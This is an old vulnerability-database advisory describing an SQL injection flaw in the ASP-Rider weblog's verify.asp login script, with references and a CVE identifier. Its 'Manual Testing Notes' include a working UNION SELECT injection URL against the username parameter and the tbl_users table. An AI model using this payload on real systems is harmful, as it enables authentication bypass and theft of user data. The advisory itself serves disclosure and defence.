ASP-Rider verify.asp username Parameter SQL Injection

2004-12-14T00:00:00
ID OSVDB:12548
Type osvdb
Reporter Shervin Khaleghjou(oil_karchack@yahoo.com)
Modified 2004-12-14T00:00:00

Description

Vulnerability Description

ASP-Rider contains a flaw that will allow a remote attacker to inject arbitrary SQL code. The problem is that the 'username' parameter in the 'verify.asp' script is not verified properly and will allow an attacker to inject or manipulate SQL queries.

Solution Description

Currently, there are no known workarounds or upgrades to correct this issue. However, ASP-Rider.com has released a patch to address this vulnerability.

Short Description

ASP-Rider contains a flaw that will allow a remote attacker to inject arbitrary SQL code. The problem is that the 'username' parameter in the 'verify.asp' script is not verified properly and will allow an attacker to inject or manipulate SQL queries.

Manual Testing Notes

http://[victim]/weblog/blogadmin/verify.asp?username='union select 1,1,1,1,1,1,1,1 from tbl_users where ''='&password=1

References:

Vendor URL: http://weblog.asp-rider.com/ Security Tracker: 1010549 Secunia Advisory ID:13470 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-12/0151.html ISS X-Force ID: 18479 CVE-2004-1401 Bugtraq ID: 11933